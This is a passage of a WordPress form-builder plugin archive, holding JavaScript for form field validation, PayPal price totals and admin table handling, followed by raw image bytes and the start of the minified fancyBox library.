						case "type_textarea":
							{
								if(document.getElementById(i+"_element"+form_id).innerHTML==document.getElementById(i+"_element"+form_id).title || document.getElementById(i+"_element"+form_id).innerHTML=="")
									seted=false;
									break;
							}
							
						case "type_name":
							{	
							if(document.getElementById(i+"_element_title"+form_id))
								{
									if(document.getElementById(i+"_element_title"+form_id).value=="" || document.getElementById(i+"_element_first"+form_id).value=="" || document.getElementById(i+"_element_last"+form_id).value=="" || document.getElementById(i+"_element_middle"+form_id).value=="" ||   document.getElementById(i+"_element_first"+form_id).value==document.getElementById(i+"_element_first"+form_id).title || document.getElementById(i+"_element_last"+form_id).value==document.getElementById(i+"_element_last"+form_id).title ||   document.getElementById(i+"_element_title"+form_id).value==document.getElementById(i+"_element_title"+form_id).title || document.getElementById(i+"_element_middle"+form_id).value==document.getElementById(i+"_element_middle"+form_id).title)
										seted=false;
								}
								else
								{
									if(document.getElementById(i+"_element_first"+form_id).value=="" || document.getElementById(i+"_element_last"+form_id).value=="" ||   document.getElementById(i+"_element_first"+form_id).value==document.getElementById(i+"_element_first"+form_id).title || document.getElementById(i+"_element_last"+form_id).value==document.getElementById(i+"_element_last"+form_id).title)
										seted=false;
								}
								break;
	
							}
							
						case "type_phone":
							{	
								if(document.getElementById(i+"_element_first"+form_id).value=="" || document.getElementById(i+"_element_last"+form_id).value=="" ||   document.getElementById(i+"_element_first"+form_id).value==document.getElementById(i+"_element_first"+form_id).title || document.getElementById(i+"_element_last"+form_id).value==document.getElementById(i+"_element_last"+form_id).title  )
									seted=false;
								break;
	
							}
							
						case "type_address":
							{	
								if ((document.getElementById(i+"_street1"+form_id) && document.getElementById(i+"_street1"+form_id).value=="") || (document.getElementById(i+"_city"+form_id) && document.getElementById(i+"_city"+form_id).value=="") || (document.getElementById(i+"_state"+form_id) && document.getElementById(i+"_state"+form_id).value=="") || (document.getElementById(i+"_postal"+form_id) && document.getElementById(i+"_postal"+form_id).value=="") || (document.getElementById(i+"_country"+form_id) && document.getElementById(i+"_country"+form_id).value==""))
									seted=false;
								break;
	
							}
							
	
						case "type_checkbox":
						case "type_radio":
							{
								is=true;
								for(j=0; j<100; j++)
									if(document.getElementById(i+"_element"+form_id+j))
										if(document.getElementById(i+"_element"+form_id+j).checked)
										{
											is=false;										
											break;
										}
								if(is)
								seted=false;
								break;
							}
							
						case "type_time":
							{	
							if(document.getElementById(i+"_ss"+form_id))
								{
									if(document.getElementById(i+"_ss"+form_id).value=="" || document.getElementById(i+"_mm"+form_id).value=="" || document.getElementById(i+"_hh"+form_id).value=="")
										seted=false;
								}
								else
								{
									if(document.getElementById(i+"_mm"+form_id).value=="" || document.getElementById(i+"_hh"+form_id).value=="")
										seted=false;
								}
								break;
	
							}
							
						case "type_date":
							{	
								if(document.getElementById(i+"_element"+form_id).value=="")
									seted=false;
								break;
							}
						case "type_date_fields":
							{	
								if(document.getElementById(i+"_day"+form_id).value=="" || document.getElementById(i+"_month"+form_id).value=="" || document.getElementById(i+"_year"+form_id).value=="")
									seted=false;
								break;
							}
            case "type_paypal_price":
							{	
								if(document.getElementById(i+"_element_dollars"+form_id).value=="" || document.getElementById(i+"_element_cents"+form_id).value=="" ||   document.getElementById(i+"_element_dollars"+form_id).value==document.getElementById(i+"_element_dollars"+form_id).title || document.getElementById(i+"_element_cents"+form_id).value==document.getElementById(i+"_element_cents"+form_id).title)
									seted=false;
								break;
							}
            case "type_star_rating":
							{
						
								if(document.getElementById(i+"_selected_star_amount"+form_id).value=="")
										seted=false;
									break;		
						    }
							
								case "type_scale_rating":
							{
						
								var scale_radio_checked=false;
								for(var k=1; k<100; k++){
								if(document.getElementById(i+"_scale_radio"+form_id+"_"+k)){
							
								if(document.getElementById(i+"_scale_radio"+form_id+"_"+k).checked==true)
								scale_radio_checked=true;
								}
								}	
					
								if(scale_radio_checked==false)
										seted=false;
									break;		
						    
							}
							case "type_spinner":
							{
						
								if(!document.getElementById(i+"_element"+form_id).getAttribute('aria-valuenow'))
										seted=false;
									break;		
						    }
							case "type_slider":
							{
						
								if(document.getElementById(i+"_slider_value"+form_id).value==document.getElementById(i+"_slider_min_value"+form_id).value)
										seted=false;
									break;		
						    }
							case "type_range":
							{
						
								if(!document.getElementById(i+"_element"+form_id+"0").getAttribute('aria-valuenow') && !document.getElementById(i+"_element"+form_id+"1").getAttribute('aria-valuenow'))
										seted=false;
									break;		
						    }
								case "type_grading":
							{
						
					        var grading_input=false;
					     	for(var k=0; k<100; k++){
							if(document.getElementById(i+"_element"+form_id+k)){
							
								if(document.getElementById(i+"_element"+form_id+k).value!="")
								grading_input=true;
							}
                            }	
					
								if(grading_input==false)
										seted=false;
									break;		
						    
							}
							case "type_matrix":
							{
						
								if(document.getElementById(i+"_input_type"+form_id).value=='radio' || document.getElementById(i+"_input_type"+form_id).value=='checkbox')
								{
								var radio_checked=false;
								for(var k=1;k<=100;k++){
								    for(var j=1;j<=100;j++)
									{
									if(document.getElementById(i+"_input_element"+form_id+k+"_"+j)){
									
									if(document.getElementById(i+"_input_element"+form_id+k+"_"+j).checked==true)
									{
									
									radio_checked=true;
									}
									}
									}
								}
								if(radio_checked==false)
								seted=false;
									
								}
								else
								{
								if(document.getElementById(i+"_input_type"+form_id).value=='text')
								{
								var checked=false;
								for(var k=1;k<=100;k++){
								    for(var j=1;j<=100;j++)
									{
									if(document.getElementById(i+"_input_element"+form_id+k+"_"+j)){
									
									if(document.getElementById(i+"_input_element"+form_id+k+"_"+j).value!="")
									{
									checked=true;
									}
									}
									}
								}
								if(checked==false)
								seted=false;
									
								}
								else
								{
								var checked=false;
								for(var k=1;k<=100;k++){
								    for(var j=1;j<=100;j++)
									{
									if(document.getElementById(i+"_select_yes_no"+form_id+k+"_"+j)){
									
									if(document.getElementById(i+"_select_yes_no"+form_id+k+"_"+j).value!="")
									{
									checked=true;
									}
									}
									}
								}
								if(checked==false)
								seted=false;
									
								
								}
								
								}
								break;	
		
									
						    }
					}	
					
				}
				else
				{	
					type=document.getElementById(i).getAttribute("type");
					if(type=="type_file_upload")
						ext_available=getfileextension(i, form_id);
							if(!ext_available)
							seted=false;
											
				}
		}
		else
		{
		
			if(!ext_available)
				{alert(WDF_FILE_TYPE_ERROR);
				break;}
			
			x=document.getElementById(i-1+'_element_label'+form_id);
			while(x.firstChild)
			{
				x=x.firstChild;
			}
			
			alert(ReqFieldMsg.replace('`FIELDNAME`', '"'+x.nodeValue+'" '));
			
			break;
		}
		
	}
	if(seted)
	for(i=0; i<=n; i++)
	{	
		if(document.getElementById(i))
			if(document.getElementById(i).getAttribute("type")=="type_submitter_mail")
				if (document.getElementById(i+"_element"+form_id).value!='' && document.getElementById(i+"_element"+form_id).value.search(/^\w+((-\w+)|(\.\w+))*\@[A-Za-z0-9]+((\.|-)[A-Za-z0-9]+)*\.[A-Za-z0-9]+$/) == -1)
				{
							alert(WDF_INVALID_EMAIL);	
							return;
				}		

	}

	if (seted) {
		return true;
  }
}	
	
function create_headers(form_id) {
  var RangeFieldMsg = eval("RangeFieldMsg_" + form_id);
  if (a[form_id] == 1) {
    return;
  }
  var is_paypal;
  n = parseInt(document.getElementById('counter' + form_id).value);
  for (i = 0; i <= n; i++) {
    if (document.getElementById(i + "_type" + form_id)) {
      type = document.getElementById(i + "_type" + form_id).value;
      is_paypal = false;
      switch(type) {
        case "type_paypal_price": {
          dollars = 0;
          cents = 0;
          if (document.getElementById(i + "_element_dollars" + form_id).value && document.getElementById(i + "_element_dollars" + form_id).value != document.getElementById(i + "_element_dollars" + form_id).title) {
            dollars = document.getElementById(i + "_element_dollars" + form_id).value;
          }
          if (document.getElementById(i + "_element_cents" + form_id).value && document.getElementById(i + "_element_cents" + form_id).value != document.getElementById(i + "_element_cents" + form_id).title) {
            cents = document.getElementById(i + "_element_cents" + form_id).value;
          }
      
          var price = dollars + '.' + cents;
          if (isNaN(price)) {
            alert('Invalid value of number field');
            return;
          }
          var range_min = 0;
          var range_max = -1;
          if (document.getElementById(i + "_range_min" + form_id).value) {
            range_min = document.getElementById(i + "_range_min" + form_id).value;
          }
          if (document.getElementById(i + "_range_max" + form_id).value) {
            range_max =document.getElementById(i + "_range_max" + form_id).value;
          }
          if (document.getElementById(i + "_required" + form_id).value == "yes" || (document.getElementById(i + "_element_dollars" + form_id).value != document.getElementById(i + "_element_dollars" + form_id).title) || document.getElementById(i + "_element_cents" + form_id).value != document.getElementById(i + "_element_cents" + form_id).title) {
            if ((range_max != -1 && parseFloat(price) > range_max) || parseFloat(price) < range_min) {
              x = document.getElementById(i+"_element_label"+form_id).innerHTML;
              f = 0;
              t = 'any';
              if (document.getElementById(i+"_range_min"+form_id).value) {
                f=document.getElementById(i+"_range_min"+form_id).value;
              }
              if (document.getElementById(i + "_range_max" + form_id).value) {
                t = document.getElementById(i + "_range_max" + form_id).value;
              }
              alert(RangeFieldMsg.replace('`FIELDNAME`', '"' + x + '" ').replace('`FROM`', f).replace('`TO`', t));
              return;
            }
          }
          break;

        }
        case "type_paypal_select": {
          select_ = document.getElementById(i + "_element" + form_id);
          var phid = document.createElement("input");
          phid.setAttribute("type", "hidden");
          phid.setAttribute("name", i + "_element_label" + form_id);
          phid.setAttribute("id", i + "_element_label" + form_id);
          phid.value = select_.options[select_.selectedIndex].text;
          document.getElementById(i + "_type" + form_id).parentNode.appendChild(phid);
          is_paypal = true;
          break;

        }
        case "type_paypal_shipping":
        case "type_paypal_radio": {
          var phid = document.createElement("input");
          phid.setAttribute("type", "hidden");
          phid.setAttribute("name", i + "_element_label"+ form_id);
          phid.setAttribute("id", i + "_element_label" + form_id);
          if (getRadioCheckedValue(i + "_element" + form_id)) {
            phid.value = document.getElementById(getRadioCheckedValue(i + "_element" + form_id)).value;							
          }
          else {
            phid.value = '';
          }
          document.getElementById(i + "_type" + form_id).parentNode.appendChild(phid);
          is_paypal = true;
          break;

        }
        case "type_paypal_checkbox": {
          is_paypal = true;          
          break;
        }
      }	
      if (is_paypal) {
        if (document.getElementById(i + "_element_quantity" + form_id)) {
          var phid = document.createElement("input");
          phid.setAttribute("type", "hidden");
          phid.setAttribute("name", i + "_element_quantity_label" + form_id);
          phid.setAttribute("id", i + "_element_quantity_label" + form_id);
          phid.value = document.getElementById(i + "_element_quantity_label_" + form_id).innerHTML;
          document.getElementById(i + "_type" + form_id).parentNode.appendChild(phid);
        }
        for (k = 0; k <= 50; k++) {
          if (document.getElementById(i + "_property" + form_id + k)) {
            select_ = document.getElementById(i + "_property" + form_id + k);
            var phid = document.createElement("input");
            phid.setAttribute("type", "hidden");
            phid.setAttribute("name", i + "_element_property_value" + form_id + k);
            phid.setAttribute("id", i + "_element_property_value" + form_id + k);
            phid.value = select_.value;
            document.getElementById(i + "_type" + form_id).parentNode.appendChild(phid);
            var phid = document.createElement("input");
            phid.setAttribute("type", "hidden");
            phid.setAttribute("name", i + "_element_property_label" + form_id + k);
            phid.setAttribute("id", i + "_element_property_label" + form_id + k);
            phid.value = document.getElementById(i + "_property_label_" + form_id + k).innerHTML;
            document.getElementById(i + "_type" + form_id).parentNode.appendChild(phid);
          }
        }
      }
    }		
	}
  a[form_id] = 1;
  document.getElementById("form" + form_id).submit();
}

var rated=false;

function change_src(id,a,form_id){
	if(rated==false){
	for(var j=0;j<=id;j++)
	document.getElementById(a+'_star_'+j).src = fm_objectL10n.plugin_url+'/images/star_'+document.getElementById(a+'_star_color'+form_id).value+".png";
}
}


function reset_src(id,a){
	if(rated==false){
	for(var j=0;j<=id;j++)
	document.getElementById(a+'_star_'+j).src= fm_objectL10n.plugin_url+'/images/star.png';
	}
}


function select_star_rating(id,a,form_id)
{
	rated=true;
	star_amount=document.getElementById(a+'_star_amount'+form_id).value;
	for(var j=0;j<=id;j++)
	document.getElementById(a+'_star_'+j).src = fm_objectL10n.plugin_url+'/images/star_'+document.getElementById(a+'_star_color'+form_id).value+".png";
	for(var k=id+1;k<=star_amount-1;k++)
	document.getElementById(a+'_star_'+k).src = fm_objectL10n.plugin_url+'/images/star.png';
	document.getElementById(a+'_selected_star_amount'+form_id).value=id+1;
}




function sum_grading_values(num,form_id){

	var sum = 0;
	for(var k=0; k<100;k++)
	{
		if(document.getElementById(num+'_element'+form_id+k))
			if(document.getElementById(num+'_element'+form_id+k).value)
			{
				sum = sum+parseInt(document.getElementById(num+'_element'+form_id+k).value);
			}
			
        if(document.getElementById(num+'_total_element'+form_id)){
		if(sum > document.getElementById(num+'_total_element'+form_id).innerHTML){
		  document.getElementById(num+'_text_element'+form_id).innerHTML = WDF_GRADING_TEXT + ' ' + document.getElementById(num+'_total_element'+form_id).innerHTML;
		}
		else{
		document.getElementById(num+'_text_element'+form_id).innerHTML="";
		}
		}
	}
	
	 if(document.getElementById(num+'_sum_element'+form_id))
	document.getElementById(num+'_sum_element'+form_id).innerHTML = sum;

}






function set_total_value(id,form_id) {
var div_paypal_show= jQuery('.paypal_total'+form_id);
var div_paypal_products = jQuery('.paypal_products'+form_id);
var div_paypal_tax = jQuery('.paypal_tax'+form_id);
var input_paypal_total = jQuery('.input_paypal_total'+form_id);
var div_paypal_tax = jQuery('.paypal_tax'+form_id);
var input_paypal_total = jQuery('.input_paypal_total'+form_id);
var total = 0;
var total_shipping = 0;
var FormCurrency = eval("FormCurrency_" + form_id);
var FormPaypalTax = eval("FormPaypalTax_" + form_id);
	if(div_paypal_products)
	div_paypal_products.html('');
	div_paypal_tax.html('');
	n=parseInt(jQuery('#counter'+form_id).val());
	

	for(i=0; i<n; i++)


	{	
	

		if(jQuery('#'+i+"_type"+form_id).length != 0)
		{

				type=document.getElementById(i+"_type"+form_id).value;


					switch(type)


					{
	
						case "type_paypal_checkbox":
					
						case "type_paypal_radio":

							{

		

								for(j=0; j<100; j++)


									if(document.getElementById(i+"_element"+form_id+j))


										if(document.getElementById(i+"_element"+form_id+j).checked)


										{

										
											var div = document.createElement('div');
												div.style.cssText = "display:table-row";

											var span_label = document.createElement('div');
												span_label.style.cssText = "display:table-cell";
												span_label.innerHTML= document.getElementById(i+"_elementlabel_"+form_id+j).value;
											
											var span_value = document.createElement('div');
												span_value.style.cssText = "display:table-cell";
												span_value.style.cssText = 'margin-left: 7px;';
											if(document.getElementById(i+"_element_quantity"+form_id) && document.getElementById(i+"_element_quantity"+form_id).value!=1)
											{
												span_value.innerHTML= FormCurrency + document.getElementById(i+"_element"+form_id+j).value+' x'+document.getElementById(i+"_element_quantity"+form_id).value;
												total =total + document.getElementById(i+"_element_quantity"+form_id).value * parseInt(document.getElementById(i+"_element"+form_id+j).value);
										
											}	
											else
											{
												span_value.innerHTML= FormCurrency + document.getElementById(i+"_element"+form_id+j).value;
												total =total + parseInt(document.getElementById(i+"_element"+form_id+j).value);
											}		
												
												
												div.appendChild(span_label);
												div.appendChild(span_value);
												div_paypal_products.append(div);
												
																					
										
										


										}
										
								break;

							}
              case "type_paypal_shipping":
              {
                for(j=0; j<100; j++)
                  if(document.getElementById(i+"_element"+form_id+j))
                    if(document.getElementById(i+"_element"+form_id+j).checked)
                    {
                      var div = document.createElement('div');
                        div.style.cssText = "display:table-row";

                      var span_label = document.createElement('div');
                        span_label.style.cssText = "display:table-cell";
                        span_label.innerHTML= document.getElementById(i+"_elementlabel_"+form_id+j).value;
                      
                      var span_value = document.createElement('div');
                        span_value.style.cssText = "display:table-cell";
                        span_value.style.cssText = 'margin-left: 7px;';
                        
                      span_value.innerHTML= FormCurrency + document.getElementById(i+"_element"+form_id+j).value;
                      total_shipping =total_shipping + parseInt(document.getElementById(i+"_element"+form_id+j).value);
                        

                      div.appendChild(span_label);
                      div.appendChild(span_value);
                      var div_shipping_total = div;
                    }
                break;

              }


							case "type_paypal_select":


							{	

							
								for(j=0; j<document.getElementById(i+"_element"+form_id).childNodes.length; j++)

								
									if(document.getElementById(i+"_element"+form_id).childNodes[j].selected==true && document.getElementById(i+"_element"+form_id).childNodes[j].value)


										{

									
											var div = document.createElement('div');
												div.style.cssText = "display:table-row";

											var span_label = document.createElement('div');
												span_label.style.cssText = "display:table-cell";
												span_label.innerHTML= document.getElementById(i+"_element"+form_id).childNodes[j].innerHTML;
											
											var span_value = document.createElement('div');
												span_value.style.cssText = "display:table-cell";
												span_value.style.cssText = 'margin-left: 7px;';
												
											if(document.getElementById(i+"_element_quantity"+form_id) && document.getElementById(i+"_element_quantity"+form_id).value!=1)
											{
                        span_value.innerHTML= FormCurrency + document.getElementById(i+"_element"+form_id).childNodes[j].value+' x'+document.getElementById(i+"_element_quantity"+form_id).value;
												total =total + document.getElementById(i+"_element_quantity"+form_id).value * parseInt(document.getElementById(i+"_element"+form_id).childNodes[j].value);
										
											}	
											else
											{
												span_value.innerHTML= FormCurrency + document.getElementById(i+"_element"+form_id).childNodes[j].value;
												total =total + parseInt(document.getElementById(i+"_element"+form_id).childNodes[j].value);
											}	
											
											
												div.appendChild(span_label);
												div.appendChild(span_value);
												div_paypal_products.append(div);
												
																					
										
										


										}										

								break;


							}
							
							case "type_paypal_price":


							
							{	

							if(document.getElementById(i+"_element_dollars"+form_id).value || document.getElementById(i+"_element_cents"+form_id).value)
							{
							
								
											var div = document.createElement('div');
												div.style.cssText = "display:table-row";
												

											var span_label = document.createElement('div');
												span_label.style.cssText = "display:table-cell";
												span_label.innerHTML= document.getElementById(i+"_element_label"+form_id).innerHTML;
										

											var span_value = document.createElement('div');
												span_value.style.cssText = "display:table-cell";
												span_value.style.cssText = 'margin-left: 7px;';
												
												if(document.getElementById(i+"_element_cents"+form_id) && document.getElementById(i+"_element_cents"+form_id).value)
												{
													if(document.getElementById(i+"_element_dollars"+form_id).value)
													var dollars = document.getElementById(i+"_element_dollars"+form_id).value;
													else
													var dollars = 0;
													
														if(document.getElementById(i+"_element_cents"+form_id).value.length==1)
														span_value.innerHTML=  dollars+'.0'+document.getElementById(i+"_element_cents"+form_id).value;
													
														else
														span_value.innerHTML= dollars+'.'+document.getElementById(i+"_element_cents"+form_id).value;
													
												}
												else
												span_value.innerHTML=  document.getElementById(i+"_element_dollars"+form_id).value;

												
												
												total =total + parseFloat(span_value.innerHTML);
												span_value.innerHTML = FormCurrency + span_value.innerHTML;
												
												
												div.appendChild(span_label);
												div.appendChild(span_value);
												div_paypal_products.append(div);
										
							}
								break;
							}
					}	
		}
	}
  div_paypal_products.append(div_shipping_total);
  if (FormPaypalTax != 0) {
    div_paypal_tax.html('Tax: ' + FormCurrency + (((total)*FormPaypalTax) / 100).toFixed(2));	
  }
  jQuery('.div_total'+form_id).html(FormCurrency + (parseFloat((total *(1+FormPaypalTax/100)).toFixed(2))+total_shipping));
  input_paypal_total.val(FormCurrency + (parseFloat((total *(1+FormPaypalTax/100)).toFixed(2))+total_shipping));
}
js/form_maker_admin.js000060400000022305152434416630011016 0ustar00function fm_select_value(obj) {
  obj.focus();
  obj.select();
}

function fm_doNothing(event) {
  var keyCode = event.keyCode ? event.keyCode : event.which ? event.which : event.charCode;
  if (keyCode == 13) {
    if (event.preventDefault) {
      event.preventDefault();
    }
    else {
      event.returnValue = false;
    }
  }
}

function fm_ajax_save(form_id) {
  var search_value = jQuery("#search_value").val();
  var current_id = jQuery("#current_id").val();
  var page_number = jQuery("#page_number").val();
  var search_or_not = jQuery("#search_or_not").val();
  var ids_string = jQuery("#ids_string").val();
  var image_order_by = jQuery("#image_order_by").val();
  var asc_or_desc = jQuery("#asc_or_desc").val();
  var ajax_task = jQuery("#ajax_task").val();
  var image_current_id = jQuery("#image_current_id").val();
  ids_array = ids_string.split(",");

  var post_data = {};
  post_data["search_value"] = search_value;
  post_data["current_id"] = current_id;
  post_data["page_number"] = page_number;
  post_data["image_order_by"] = image_order_by;
  post_data["asc_or_desc"] = asc_or_desc;
  post_data["ids_string"] = ids_string;
  post_data["task"] = "ajax_search";
  post_data["ajax_task"] = ajax_task;
  post_data["image_current_id"] = image_current_id;

  jQuery.post(
    jQuery('#' + form_id).action,
    post_data,

    function (data) {
      var str = jQuery(data).find('#images_table').html();
      jQuery('#images_table').html(str);
      var str = jQuery(data).find('#tablenav-pages').html();
      jQuery('#tablenav-pages').html(str);
      jQuery("#show_hide_weights").val("Hide order column");
      fm_show_hide_weights();
      fm_run_checkbox();
    }
  ).success(function (jqXHR, textStatus, errorThrown) {
  });
  return false;
}

function fm_run_checkbox() {
  jQuery("tbody").children().children(".check-column").find(":checkbox").click(function (l) {
    if ("undefined" == l.shiftKey) {
      return true
    }
    if (l.shiftKey) {
      if (!i) {
        return true
      }
      d = jQuery(i).closest("form").find(":checkbox");
      f = d.index(i);
      j = d.index(this);
      h = jQuery(this).prop("checked");
      if (0 < f && 0 < j && f != j) {
        d.slice(f, j).prop("checked", function () {
          if (jQuery(this).closest("tr").is(":visible")) {
            return h
          }
          return false
        })
      }
    }
    i = this;
    var k = jQuery(this).closest("tbody").find(":checkbox").filter(":visible").not(":checked");
    jQuery(this).closest("table").children("thead, tfoot").find(":checkbox").prop("checked", function () {
      return(0 == k.length)
    });
    return true
  });
  jQuery("thead, tfoot").find(".check-column :checkbox").click(function (m) {
    var n = jQuery(this).prop("checked"), l = "undefined" == typeof toggleWithKeyboard ? false : toggleWithKeyboard, k = m.shiftKey || l;
    jQuery(this).closest("table").children("tbody").filter(":visible").children().children(".check-column").find(":checkbox").prop("checked", function () {
      if (jQuery(this).is(":hidden")) {
        return false
      }
      if (k) {
        return jQuery(this).prop("checked")
      } else {
        if (n) {
          return true
        }
      }
      return false
    });
    jQuery(this).closest("table").children("thead,  tfoot").filter(":visible").children().children(".check-column").find(":checkbox").prop("checked", function () {
      if (k) {
        return false
      } else {
        if (n) {
          return true
        }
      }
      return false
    })
  });
}

// Set value by id.
function fm_set_input_value(input_id, input_value) {
  if (document.getElementById(input_id)) {
    document.getElementById(input_id).value = input_value;
  }
}

// Submit form by id.
function fm_form_submit(event, form_id, task, id) {
  if (document.getElementById(form_id)) {
    document.getElementById(form_id).submit();
  }
  if (event.preventDefault) {
    event.preventDefault();
  }
  else {
    event.returnValue = false;
  }
}

// Check if required field is empty.
function fm_check_required(id, name) {
  if (jQuery('#' + id).val() == '') {
    alert(name + '* field is required.');
    jQuery('#' + id).attr('style', 'border-color: #FF0000; border-style: solid; border-width: 1px;');
    jQuery('#' + id).focus();
    jQuery('html, body').animate({
      scrollTop:jQuery('#' + id).offset().top - 200
    }, 500);
    return true;
  }
  else {
    return false;
  }
}

// Show/hide order column and drag and drop column.
function fm_show_hide_weights() {
  if (jQuery("#show_hide_weights").val() == 'Show order column') {
    jQuery(".connectedSortable").css("cursor", "default");
    jQuery("#tbody_arr").find(".handle").hide(0);
    jQuery("#th_order").show(0);
    jQuery("#tbody_arr").find(".fm_order").show(0);
    jQuery("#show_hide_weights").val("Hide order column");
    if (jQuery("#tbody_arr").sortable()) {
      jQuery("#tbody_arr").sortable("disable");
    }
  }
  else {
    jQuery(".connectedSortable").css("cursor", "move");
    var page_number;
    if (jQuery("#page_number") && jQuery("#page_number").val() != '' && jQuery("#page_number").val() != 1) {
      page_number = (jQuery("#page_number").val() - 1) * 20 + 1;
    }
    else {
      page_number = 1;
    }
    jQuery("#tbody_arr").sortable({
      handle:".connectedSortable",
      connectWith:".connectedSortable",
      update:function (event, tr) {
        jQuery("#draganddrop").attr("style", "");
        jQuery("#draganddrop").html("<strong><p>Changes made in this table should be saved.</p></strong>");
        var i = page_number;
        jQuery('.fm_order').each(function (e) {
          if (jQuery(this).find('input').val()) {
            jQuery(this).find('input').val(i++);
          }
        });
      }
    });//.disableSelection();
    jQuery("#tbody_arr").sortable("enable");
    jQuery("#tbody_arr").find(".handle").show(0);
    jQuery("#tbody_arr").find(".handle").attr('class', 'handle connectedSortable');
    jQuery("#th_order").hide(0);
    jQuery("#tbody_arr").find(".fm_order").hide(0);
    jQuery("#show_hide_weights").val("Show order column");
  }
}

function fm_popup(id) {
  if (typeof id === 'undefined') {
    var id = '';
  }
  var thickDims, tbWidth, tbHeight;
      thickDims = function() {
        var tbWindow = jQuery('#TB_window'), H = jQuery(window).height(), W = jQuery(window).width(), w, h;
        w = (tbWidth && tbWidth < W - 90) ? tbWidth : W - 40;
        h = (tbHeight && tbHeight < H - 60) ? tbHeight : H - 40;
        if (tbWindow.size()) {
          tbWindow.width(w).height(h);
          jQuery('#TB_iframeContent').width(w).height(h - 27);
          tbWindow.css({'margin-left': '-' + parseInt((w / 2),10) + 'px'});
          if (typeof document.body.style.maxWidth != 'undefined') {
            tbWindow.css({'top':(H-h)/2,'margin-top':'0'});
          }
        }
      };
  thickDims();
  jQuery(window).resize(function() { thickDims() });
  jQuery('a.thickbox-preview' + id).click( function() {
    tb_click.call(this);
    var alink = jQuery(this).parents('.available-theme').find('.activatelink'), link = '', href = jQuery(this).attr('href'), url, text;
    if (tbWidth = href.match(/&width=[0-9]+/)) {
      tbWidth = parseInt(tbWidth[0].replace(/[^0-9]+/g, ''), 10);
    }
    else {
      tbWidth = jQuery(window).width() - 120;
    }
    
    if (tbHeight = href.match(/&height=[0-9]+/)) {
      tbHeight = parseInt(tbHeight[0].replace(/[^0-9]+/g, ''), 10);
    }
    else {
      tbHeight = jQuery(window).height() - 120;
    }
    if (alink.length) {
      url = alink.attr('href') || '';
      text = alink.attr('title') || '';
      link = '&nbsp; <a href="' + url + '" target="_top" class="tb-theme-preview-link">' + text + '</a>';
    }
    else {
      text = jQuery(this).attr('title') || '';
      link = '&nbsp; <span class="tb-theme-preview-link">' + text + '</span>';
    }
    jQuery('#TB_title').css({'background-color':'#222','color':'#dfdfdf'});
    jQuery('#TB_closeAjaxWindow').css({'float':'right'});
    jQuery('#TB_ajaxWindowTitle').css({'float':'left'}).html(link);
    jQuery('#TB_iframeContent').width('100%');
    thickDims();
    return false;
  });
  // Theme details
  jQuery('.theme-detail').click(function () {
    jQuery(this).siblings('.themedetaildiv').toggle();
    return false;
  });
}

function bwg_inputs() {
  jQuery(".fm_int_input").keypress(function (event) {
    var chCode1 = event.which || event.paramlist_keyCode;
    if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57) && (chCode1 != 46) && (chCode1 != 45)) {
      return false;
    }
    return true;
  });
}


function fm_check_isnum(e) {
  var chCode1 = e.which || e.paramlist_keyCode;
  if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57) && (chCode1 != 46) && (chCode1 != 45)) {
    return false;
  }
  return true;
}

function stopRKey(evt) { 
  var evt = (evt) ? evt : ((event) ? event : null); 
  var node = (evt.target) ? evt.target : ((evt.srcElement) ? evt.srcElement : null); 
  if ((evt.keyCode == 13) && (node.type=="text"))  {return false;} 
} 

document.onkeypress = stopRKey;js/fancybox/blank.gif000060400000000053152434416630010551 0ustar00GIF89a����!�,D;js/fancybox/fancybox_overlay.png000060400000001753152434416630013063 0ustar00�PNG


IHDR

�2ϽtEXtSoftwareAdobe ImageReadyq�e<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:B0C8483B9CE3E1118185EC97ECB4D81E" xmpMM:DocumentID="xmp.did:FDE98EBC032611E29899DC09CE2C174E" xmpMM:InstanceID="xmp.iid:FDE98EBB032611E29899DC09CE2C174E" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B1C8483B9CE3E1118185EC97ECB4D81E" stRef:documentID="xmp.did:B0C8483B9CE3E1118185EC97ECB4D81E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�vIDATx�b���@`b �*��B�h���_�IEND�B`�js/fancybox/jquery.fancybox.pack.js000060400000055137152434416630013412 0ustar00/*! fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license */
(function(r,G,f,v){var J=f("html"),n=f(r),p=f(G),b=f.fancybox=function(){b.open.apply(this,arguments)},I=navigator.userAgent.match(/msie/i),B=null,s=G.createTouch!==v,t=function(a){return a&&a.hasOwnProperty&&a instanceof f},q=function(a){return a&&"string"===f.type(a)},E=function(a){return q(a)&&0<a.indexOf("%")},l=function(a,d){var e=parseInt(a,10)||0;d&&E(a)&&(e*=b.getViewport()[d]/100);return Math.ceil(e)},w=function(a,b){return l(a,b)+"px"};f.extend(b,{version:"2.1.5",defaults:{padding:15,margin:20,
width:800,height:600,minWidth:100,minHeight:100,maxWidth:9999,maxHeight:9999,pixelRatio:1,autoSize:!0,autoHeight:!1,autoWidth:!1,autoResize:!0,autoCenter:!s,fitToView:!0,aspectRatio:!1,topRatio:0.5,leftRatio:0.5,scrolling:"auto",wrapCSS:"",arrows:!0,closeBtn:!0,closeClick:!1,nextClick:!1,mouseWheel:!0,autoPlay:!1,playSpeed:3E3,preload:3,modal:!1,loop:!0,ajax:{dataType:"html",headers:{"X-fancyBox":!0}},iframe:{scrolling:"auto",preload:!0},swf:{wmode:"transparent",allowfullscreen:"true",allowscriptaccess:"always"},
